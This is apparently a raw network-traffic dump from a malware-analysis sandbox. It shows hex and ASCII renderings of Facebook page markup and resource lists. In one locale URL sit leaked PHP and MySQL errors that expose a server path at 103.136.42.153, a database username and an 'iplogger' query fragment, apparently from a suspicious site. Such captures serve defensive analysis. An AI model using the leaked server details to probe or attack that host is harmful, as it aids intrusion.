2022-10-07 13:59:47 UTC	945	IN	Data Raw: 25 33 43 2f 62 25 33 45 25 32 30 6f 6e 25 32 30 6c 69 6e 65 25 32 30 25 33 43 62 25 33 45 37 33 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 62 72 25 32 30 2f 25 33 45 25 30 41 25 33 43 66 6f 6e 74 25 32 30 63 6f 6c 6f 72 3d 25 32 32 25 32 33 30 30 30 30 30 30 25 32 32 25 33 45 25 30 41 25 33 43 62 25 33 45 31 30 34 35 25 32 30 2d 25 32 30 41 63 63 65 73 73 25 32 30 64 65 6e 69 65 64 25 32 30 66 6f 72 25 32 30 75 73 65 72 25 32 30 26 23 30 33 39 3b 64 62 6e 65 77 30 31 26 23 30 33 39 3b 26 23 30 36 34 3b 26 23 30 33 39 3b 6c 6f 63 61 6c 68 6f 73 74 26 23 30 33 39 3b 25 32 30 28 75 73 69 6e 67 25 32 30 70 61 73 73 77 6f 72 64 3a 25 32 30 59 45 53 29 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 73 65 6c 65 63 74 25 32 30 69 70 6c 6f 67 67 65 72 25 Data Ascii: %3C/b%3E%20on%20line%20%3Cb%3E73%3C/b%3E%0A%3Cbr%20/%3E%0A%3Cfont%20color=%22%23000000%22%3E%0A%3Cb%3E1045%20-%20Access%20denied%20for%20user%20'dbnew01'@'localhost'%20(using%20password:%20YES)%3Cbr%3E%0A%3Cbr%3Eselect%20iplogger%
2022-10-07 13:59:47 UTC	945	IN	Data Raw: 30 30 25 32 32 25 33 45 25 35 42 54 45 50 25 32 30 53 54 4f 50 25 35 44 25 33 43 2f 66 6f 6e 74 25 33 45 25 30 41 25 33 43 2f 73 6d 61 6c 6c 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 62 72 25 33 45 25 30 41 25 33 43 2f 62 25 33 45 25 30 41 25 33 43 2f 66 6f 6e 74 25 33 45 22 20 6f 6e 63 6c 69 63 6b 3d 22 72 65 71 75 69 72 65 28 26 71 75 6f 74 3b 49 6e 74 6c 55 74 69 6c 73 26 71 75 6f 74 3b 29 2e 73 65 74 43 6f 6f 6b 69 65 4c 6f 63 61 6c 65 28 26 71 75 6f 74 3b 7a 68 5f 43 4e 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 65 6e 5f 55 53 26 71 75 6f 74 3b 2c 20 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 7a 68 2d 63 6e 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 5c 2f 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 Data Ascii: 00%22%3E%5BTEP%20STOP%5D%3C/font%3E%0A%3C/small%3E%0A%3Cbr%3E%0A%3Cbr%3E%0A%3C/b%3E%0A%3C/font%3E" onclick="require("IntlUtils").setCookieLocale("zh_CN", "en_US", "https:\/\/zh-cn.facebook.com\/\u00253Cbr\u002520\/\u0025
2022-10-07 13:59:47 UTC	947	IN	Data Raw: 75 30 30 32 35 32 30 69 6e 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 5c 2f 77 77 77 5c 2f 77 77 77 72 6f 6f 74 5c 2f 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 5c 2f 73 65 65 6d 6f 72 65 62 74 79 5c 2f 69 6e 63 6c 75 64 65 73 5c 2f 64 61 74 61 62 61 73 65 2e 70 68 70 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 32 30 6f 6e 5c 75 30 30 32 35 32 30 6c 69 6e 65 5c 75 30 30 32 35 32 30 5c 75 30 30 32 35 33 43 62 5c 75 30 30 32 35 33 45 37 33 5c 75 30 30 32 35 33 43 5c 2f 62 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 62 72 5c 75 30 30 32 35 32 30 5c 2f 5c 75 30 30 32 35 33 45 5c 75 30 30 32 35 30 41 5c 75 30 30 32 35 33 43 66 6f 6e 74 5c 75 30 30 32 35 32 30 63 6f 6c 6f Data Ascii: u002520in\u002520\u00253Cb\u00253E\/www\/wwwroot\/103.136.42.153\/seemorebty\/includes\/database.php\u00253C\/b\u00253E\u002520on\u002520line\u002520\u00253Cb\u00253E73\u00253C\/b\u00253E\u00250A\u00253Cbr\u002520\/\u00253E\u00250A\u00253Cfont\u002520colo
2022-10-07 13:59:47 UTC	948	IN	Data Raw: 33 41 25 32 35 32 30 75 73 65 25 32 35 32 30 6d 79 73 71 6c 69 25 32 35 32 30 6f 72 25 32 35 32 30 50 44 4f 25 32 35 32 30 69 6e 73 74 65 61 64 25 32 35 32 30 69 6e 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 25 32 46 77 77 77 25 32 46 77 77 77 72 6f 6f 74 25 32 46 31 30 33 2e 31 33 36 2e 34 32 2e 31 35 33 25 32 46 73 65 65 6d 6f 72 65 62 74 79 25 32 46 69 6e 63 6c 75 64 65 73 25 32 46 64 61 74 61 62 61 73 65 2e 70 68 70 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 32 30 6f 6e 25 32 35 32 30 6c 69 6e 65 25 32 35 32 30 25 32 35 33 43 62 25 32 35 33 45 34 37 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 32 30 25 32 46 25 32 35 33 45 Data Ascii: 3A%2520use%2520mysqli%2520or%2520PDO%2520instead%2520in%2520%253Cb%253E%2Fwww%2Fwwwroot%2F103.136.42.153%2Fseemorebty%2Fincludes%2Fdatabase.php%253C%2Fb%253E%2520on%2520line%2520%253Cb%253E47%253C%2Fb%253E%250A%253Cbr%2520%2F%253E%250A%253Cbr%2520%2F%253E
2022-10-07 13:59:47 UTC	950	IN	Data Raw: 6c 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 62 72 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 62 25 32 35 33 45 25 32 35 30 41 25 32 35 33 43 25 32 46 66 6f 6e 74 25 32 35 33 45 26 61 6d 70 3b 73 6f 75 72 63 65 3d 77 77 77 5f 6c 69 73 74 5f 73 65 6c 65 63 74 6f 72 5f 6d 6f 72 65 22 20 68 72 65 66 3d 22 23 22 20 74 69 74 6c 65 3d 22 53 68 6f 77 20 6d 6f 72 65 20 6c 61 6e 67 75 61 67 65 73 22 3e 3c 69 20 63 6c 61 73 73 3d 22 69 6d 67 20 73 70 5f 6f 74 31 74 35 59 6a 59 4c 33 73 20 73 78 5f 32 63 66 61 37 64 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 2f 75 6c 3e 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 43 75 72 76 65 22 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 69 64 3d 22 70 61 67 65 46 Data Ascii: l%253E%250A%253Cbr%253E%250A%253Cbr%253E%250A%253C%2Fb%253E%250A%253C%2Ffont%253E&source=www_list_selector_more" href="#" title="Show more languages"><i class="img sp_ot1t5YjYL3s sx_2cfa7d"></i></a></li></ul><div id="contentCurve"></div><div id="pageF
2022-10-07 13:59:47 UTC	951	IN	Data Raw: 42 6c 59 38 4c 78 68 7a 48 71 34 2d 50 39 31 4c 68 55 6a 31 76 43 4e 52 67 63 32 35 68 73 57 35 46 51 46 66 4a 4c 66 4e 6f 6d 4a 44 62 43 33 66 59 79 6d 53 33 38 6c 58 34 65 4c 4e 4b 6a 75 71 41 57 4f 6a 36 41 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 49 6e 73 74 61 67 72 61 6d 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 6e 6f 66 6f 6c 6c 6f 77 22 20 64 61 74 61 2d 6c 79 6e 78 2d 6d 6f 64 65 3d 22 68 6f 76 65 72 22 3e 49 6e 73 74 61 67 72 61 6d 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 75 6c 6c 65 74 69 6e 2e 63 6f 6d 2f 22 20 74 69 74 6c 65 3d 22 43 68 65 63 6b 20 6f 75 74 20 42 75 6c 6c 65 74 69 6e 20 4e 65 77 73 6c 65 74 74 65 72 22 3e 42 75 6c 6c 65 Data Ascii: BlY8LxhzHq4-P91LhUj1vCNRgc25hsW5FQFfJLfNomJDbC3fYymS38lX4eLNKjuqAWOj6A" title="Check out Instagram" target="_blank" rel="nofollow" data-lynx-mode="hover">Instagram</a></li><li><a href="https://www.bulletin.com/" title="Check out Bulletin Newsletter">Bulle
2022-10-07 13:59:47 UTC	953	IN	Data Raw: 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 3e 50 72 69 76 61 63 79 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 68 72 65 66 3d 22 2f 70 6f 6c 69 63 69 65 73 2f 63 6f 6f 6b 69 65 73 2f 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 63 6f 6f 6b 69 65 73 20 61 6e 64 20 46 61 63 65 62 6f 6f 6b 2e 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 3e 43 6f 6f 6b 69 65 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 3e 3c 61 20 63 6c 61 73 73 3d 22 5f 34 31 75 67 22 20 64 61 74 61 2d 6e 6f 63 6f 6f 6b 69 65 73 3d 22 31 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 66 61 63 65 62 6f 6f 6b 2e 63 6f 6d 2f 68 65 6c 70 2f 35 36 38 31 33 37 34 39 33 33 30 32 32 31 37 22 20 74 69 74 6c 65 3d 22 4c 65 61 72 6e 20 61 62 6f 75 74 20 41 Data Ascii: and Facebook.">Privacy</a></li><li><a href="/policies/cookies/" title="Learn about cookies and Facebook." data-nocookies="1">Cookies</a></li><li><a class="_41ug" data-nocookies="1" href="https://www.facebook.com/help/568137493302217" title="Learn about A
2022-10-07 13:59:47 UTC	954	IN	Data Raw: 22 3a 22 41 54 37 42 2d 32 4b 65 48 31 67 4f 4f 56 66 4c 34 48 30 22 7d 2c 22 33 32 31 32 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 37 74 67 64 6f 62 69 45 6f 43 35 71 4f 41 4f 67 55 22 7d 2c 22 31 39 30 38 31 33 35 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 6d 69 47 79 70 4a 6c 33 6d 32 41 71 34 54 5f 4d 22 7d 2c 22 35 32 34 22 3a 7b 22 72 65 73 75 6c 74 22 3a 66 61 6c 73 65 2c 22 68 61 73 68 22 3a 22 41 54 36 53 4c 4e 52 65 67 31 69 6a 68 33 62 5a 62 39 41 22 7d 2c 22 32 35 32 36 22 3a 7b 22 72 65 73 75 6c 74 22 3a 74 72 75 65 2c 22 68 61 73 68 22 3a 22 41 54 34 47 4a 37 73 7a 6f 42 42 74 47 44 58 78 4d 39 55 22 7d 2c 22 38 31 39 32 33 36 22 3a 7b 22 72 65 73 75 6c 74 Data Ascii: ":"AT7B-2KeH1gOOVfL4H0"},"3212":{"result":false,"hash":"AT7tgdobiEoC5qOAOgU"},"1908135":{"result":false,"hash":"AT6miGypJl3m2Aq4T_M"},"524":{"result":false,"hash":"AT6SLNReg1ijh3bZb9A"},"2526":{"result":true,"hash":"AT4GJ7szoBBtGDXxM9U"},"819236":{"result
2022-10-07 13:59:47 UTC	955	IN	Data Raw: 52 78 49 73 22 7d 7d 2c 22 71 65 78 44 61 74 61 22 3a 7b 22 36 34 34 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 2c 22 36 34 37 22 3a 7b 22 72 22 3a 6e 75 6c 6c 7d 7d 7d 29 7d 29 3b 72 65 71 75 69 72 65 4c 61 7a 79 28 5b 22 42 6f 6f 74 6c 6f 61 64 65 72 22 5d 2c 66 75 6e 63 74 69 6f 6e 28 6d 29 7b 6d 2e 68 61 6e 64 6c 65 50 61 79 6c 6f 61 64 28 7b 22 63 6f 6e 73 69 73 74 65 6e 63 79 22 3a 7b 22 72 65 76 22 3a 31 30 30 36 33 34 31 35 32 34 7d 2c 22 72 73 72 63 4d 61 70 22 3a 7b 22 6e 36 57 34 78 4d 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 37 4d 35 34 5c 2f 79 46 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 42 4c 41 Data Ascii: RxIs"}},"qexData":{"644":{"r":null},"647":{"r":null}}})});requireLazy(["Bootloader"],function(m){m.handlePayload({"consistency":{"rev":1006341524},"rsrcMap":{"n6W4xMH":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3i7M54\/yF\/l\/en_US\/BLA
2022-10-07 13:59:47 UTC	957	IN	Data Raw: 2e 70 68 70 5c 2f 76 33 5c 2f 79 55 5c 2f 72 5c 2f 4a 6d 32 6c 32 6a 6c 4c 79 46 36 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 4b 59 30 51 4b 54 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 69 5c 2f 72 5c 2f 69 69 44 62 59 4d 43 50 74 42 33 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 33 5a 7a 41 6d 47 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 Data Ascii: .php\/v3\/yU\/r\/Jm2l2jlLyF6.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"hKY0QKT":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yi\/r\/iiDbYMCPtB3.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"h3ZzAmG":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v
2022-10-07 13:59:47 UTC	958	IN	Data Raw: 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 78 5c 2f 72 5c 2f 58 44 44 2d 50 31 58 39 38 4b 71 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 52 35 77 31 72 43 4a 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 38 5c 2f 72 5c 2f 53 69 78 4d 30 33 41 58 45 77 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 49 61 52 5c 2f 36 75 50 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 Data Ascii: \/static.xx.fbcdn.net\/rsrc.php\/v3\/yx\/r\/XDD-P1X98Kq.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"R5w1rCJ":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/y8\/r\/SixM03AXEw8.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"IaR\/6uP":{"type":"js","src":"https:\/\/stat
2022-10-07 13:59:47 UTC	960	IN	Data Raw: 22 2c 22 6e 63 22 3a 31 7d 2c 22 68 49 77 41 32 57 36 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 79 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 51 78 68 59 47 51 37 65 31 4b 30 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6d 52 70 44 77 6d 64 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 68 5c 2f 72 5c 2f 4d 2d 43 32 73 4c 46 4a 50 30 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c Data Ascii: ","nc":1},"hIwA2W6":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yy\/l\/0,cross\/QxhYGQ7e1K0.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"mRpDwmd":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/M-C2sLFJP0M.js?_nc_x=Ij3Wp8l
2022-10-07 13:59:47 UTC	961	IN	Data Raw: 2e 70 68 70 5c 2f 76 33 5c 2f 79 48 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 73 56 46 6f 31 75 63 36 49 34 50 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 46 4a 76 47 4b 5c 2f 6a 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 45 5c 2f 6c 5c 2f 30 2c 63 72 6f 73 73 5c 2f 79 75 55 30 35 61 47 58 33 7a 35 2e 63 73 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 30 52 57 4b 4f 41 63 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e Data Ascii: .php\/v3\/yH\/l\/0,cross\/sVFo1uc6I4P.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"FJvGK\/j":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yE\/l\/0,cross\/yuU05aGX3z5.css?_nc_x=Ij3Wp8lg5Kz","nc":1},"0RWKOAc":{"type":"js","src":"https:\/\/static.xx.
2022-10-07 13:59:47 UTC	963	IN	Data Raw: 75 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 66 5c 2f 72 5c 2f 6e 53 5a 37 34 46 46 2d 7a 79 4d 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 36 59 65 33 48 37 45 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 65 77 4e 34 5c 2f 79 5f 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 5f 4a 47 43 51 67 35 6b 69 4c 68 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 59 Data Ascii: u":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yf\/r\/nSZ74FF-zyM.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"6Ye3H7E":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iewN4\/y_\/l\/en_US\/_JGCQg5kiLh.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"Y
2022-10-07 13:59:47 UTC	964	IN	Data Raw: 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 76 5c 2f 72 5c 2f 54 43 68 6f 2d 61 43 35 64 4c 4f 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 64 78 5c 2f 41 67 70 4f 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 4c 5c 2f 72 5c 2f 7a 79 61 4b 33 56 44 67 5a 47 63 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 4c 36 51 77 57 56 49 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 Data Ascii: .fbcdn.net\/rsrc.php\/v3\/yv\/r\/TCho-aC5dLO.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"dx\/AgpO":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yL\/r\/zyaK3VDgZGc.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"L6QwWVI":{"type":"css","src":"https:\/\/static.xx.fbcd
2022-10-07 13:59:47 UTC	966	IN	Data Raw: 2f 68 6b 49 4b 57 6f 71 64 68 69 4c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 73 32 78 69 74 32 76 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 4e 4f 56 34 5c 2f 79 57 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 50 39 45 4a 42 5f 5f 62 79 59 47 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 69 4e 52 54 6c 6e 71 22 3a 7b 22 74 79 70 65 22 3a 22 63 73 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f Data Ascii: /hkIKWoqdhiL.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"s2xit2v":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3iNOV4\/yW\/l\/en_US\/P9EJB__byYG.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"iNRTlnq":{"type":"css","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/
2022-10-07 13:59:47 UTC	967	IN	Data Raw: 2c 22 4d 30 4c 31 44 6f 61 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 63 51 74 34 5c 2f 79 6d 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 41 43 74 7a 4f 4d 6a 6b 72 62 6c 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 6a 6a 32 39 55 5a 42 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 64 5c 2f 72 5c 2f 30 4f 58 63 78 4b 6d 35 69 42 75 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e Data Ascii: ,"M0L1Doa":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3icQt4\/ym\/l\/en_US\/ACtzOMjkrbl.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"jj29UZB":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yd\/r\/0OXcxKm5iBu.js?_nc_x=Ij3Wp8lg5Kz","n
2022-10-07 13:59:47 UTC	969	IN	Data Raw: 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 69 34 6c 72 34 5c 2f 79 74 5c 2f 6c 5c 2f 65 6e 5f 55 53 5c 2f 53 76 5f 4c 73 46 45 65 52 47 38 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 78 32 32 4f 62 79 34 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e 78 78 2e 66 62 63 64 6e 2e 6e 65 74 5c 2f 72 73 72 63 2e 70 68 70 5c 2f 76 33 5c 2f 79 68 5c 2f 72 5c 2f 39 31 5a 56 4b 55 50 54 71 41 61 2e 6a 73 3f 5f 6e 63 5f 78 3d 49 6a 33 57 70 38 6c 67 35 4b 7a 22 2c 22 6e 63 22 3a 31 7d 2c 22 38 45 4c 43 42 77 48 22 3a 7b 22 74 79 70 65 22 3a 22 6a 73 22 2c 22 73 72 63 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 74 61 74 69 63 2e Data Ascii: cdn.net\/rsrc.php\/v3i4lr4\/yt\/l\/en_US\/Sv_LsFEeRG8.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"x22Oby4":{"type":"js","src":"https:\/\/static.xx.fbcdn.net\/rsrc.php\/v3\/yh\/r\/91ZVKUPTqAa.js?_nc_x=Ij3Wp8lg5Kz","nc":1},"8ELCBwH":{"type":"js","src":"https:\/\/static.
2022-10-07 13:59:47 UTC	970	IN	Data Raw: 22 78 32 6c 72 47 41 57 22 2c 22 76 47 74 32 6d 78 7a 22 2c 22 6c 57 4f 76 47 54 61 22 2c 22 42 49 79 6c 4b 43 34 22 2c 22 46 6e 33 72 41 6c 37 22 2c 22 52 50 4c 48 38 6a 67 22 5d 2c 22 62 65 22 3a 31 7d 2c 22 57 65 62 53 70 65 65 64 49 6e 74 65 72 61 63 74 69 6f 6e 73 54 79 70 65 64 4c 6f 67 67 65 72 22 3a 7b 22 72 22 3a 5b 22 70 51 5c 2f 69 66 58 75 22 2c 22 38 7a 62 45 5a 74 75 22 2c 22 68 4b 59 30 51 4b 54 22 2c 22 42 49 79 6c 4b 43 34 22 5d 2c 22 72 64 73 22 3a 7b 22 6d 22 3a 5b 22 42 61 6e 7a 61 69 53 63 75 62 61 5f 44 45 50 52 45 43 41 54 45 44 22 5d 7d 2c 22 62 65 22 3a 31 7d 2c 22 41 73 79 6e 63 52 65 71 75 65 73 74 22 3a 7b 22 72 22 3a 5b 22 6e 36 57 